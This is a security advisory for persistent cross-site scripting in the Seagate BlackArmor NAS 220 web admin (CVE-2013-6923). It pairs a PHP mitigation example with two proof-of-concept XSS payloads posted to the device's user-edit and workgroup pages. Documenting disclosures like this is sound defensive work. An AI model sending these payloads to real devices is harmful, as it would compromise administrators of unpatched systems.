vendor: BlackArmor NAS 220
by: Jeroen - IT Nerdbox
CVSS: 8,8 HIGH
Persistent Cross Site Scripting
CWE: 79
Product Name: BlackArmor NAS 220
Affected Version From: sg2000-2000.1331
Affected Version To: sg2000-2000.1331
Patch Exists: NO
Related CWE: CVE-2013-6923
CPE: h:seagate:blackarmor_nas_220
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2014

Seagate BlackArmor NAS – Multiple Persistent Cross Site Scripting Vulnerabilities

When adding a user to the device, it is possible to enter a full name. This input field does not sanitize its input and it is possible to enter any payload which will get executed upon reload. The workgroup configuration is also vulnerable to persistent XSS. The Work Group name input field does not sanitize its input.

Mitigation:

Input validation should be used to detect and prevent malicious input from entering the system.
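
The two fields named above (the user's full name and the Work Group name), handled with allow-list validation on input and HTML encoding on output. This is an added example, not Seagate firmware code or the advisory author's code; the function names and the character and length policies are assumptions.

```php
<?php
// Added illustration, not Seagate firmware code. Function names and the
// allow-list policies below are assumptions made for this example.

// Assumed policy for a display name: Unicode letters and digits, space,
// and . ' - only, 1 to 64 characters.
function validate_fullname(string $v): bool
{
    return preg_match('/\A[\p{L}\p{N} .\'-]{1,64}\z/u', $v) === 1;
}

// Assumed policy for a workgroup name: NetBIOS-style, 1 to 15 characters
// drawn from letters, digits, hyphen and underscore.
function validate_workname(string $v): bool
{
    return preg_match('/\A[A-Za-z0-9_-]{1,15}\z/', $v) === 1;
}

// Encode for an HTML text or quoted-attribute context. ENT_QUOTES covers
// both quote characters, so a value cannot close value="..." early.
function h(string $v): string
{
    return htmlspecialchars($v, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed sample input: one benign value per field plus the two
// strings from the advisory's proofs of concept.
$samples = [
    ['fullname', 'Jane Doe'],
    ['fullname', '<script>alert(1);</script>'],
    ['workname', 'WORKGROUP'],
    ['workname', '"><input onmouseover=prompt(1) >'],
];

foreach ($samples as [$field, $value]) {
    $ok = $field === 'fullname'
        ? validate_fullname($value)
        : validate_workname($value);

    // Validation decides whether the value is stored at all; encoding is
    // applied every time a stored value is written back into a page.
    printf("%-8s %-6s <input name=\"%s\" value=\"%s\">\n",
        $field, $ok ? 'accept' : 'reject', $field, h($value));
}
```

Both advisory strings are rejected by the validators, and the encoded form shows that they would render as inert text even if they were already in storage.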

Exploit-DB raw data:

# Exploit Title: Seagate BlackArmor NAS - Multiple Persistent Cross Site Scripting Vulnerabilities
# Google Dork: N/A
# Date: 04-01-2014
# Exploit Author: Jeroen - IT Nerdbox
# Vendor Homepage: http://www.seagate.com/
# Software Link: http://www.seagate.com/support/downloads/item/banas-220-firmware-master-dl/
# Version: sg2000-2000.1331
# Tested on: N/A
# CVE : CVE-2013-6923
#
## Description:
#
# When adding a user to the device, it is possible to enter a full name. This input field does not
# sanitize its input and it is possible to enter any payload which will get executed upon reload.
#
# The workgroup configuration is also vulnerable to persistent XSS. The Work Group name input
# field does not sanitize its input.
#
# This vulnerability was reported to Seagate in September 2013; they stated that this will not be fixed.
#
## Proof of Concept #1:
#
# POST: http(s)://<url | ip>/admin/access_control_user_edit.php?id=2&lang=en
# Parameters:
#
# index = 2
# fullname = <script>alert(1);</script>
# submit = Submit
#
## Proof of Concept #2:
#
# POST: http(s)://<url | ip>/admin/network_workgroup_domain.php?lang=en&gi=n003
# Parameter:
#
# workname = "><input onmouseover=prompt(1) >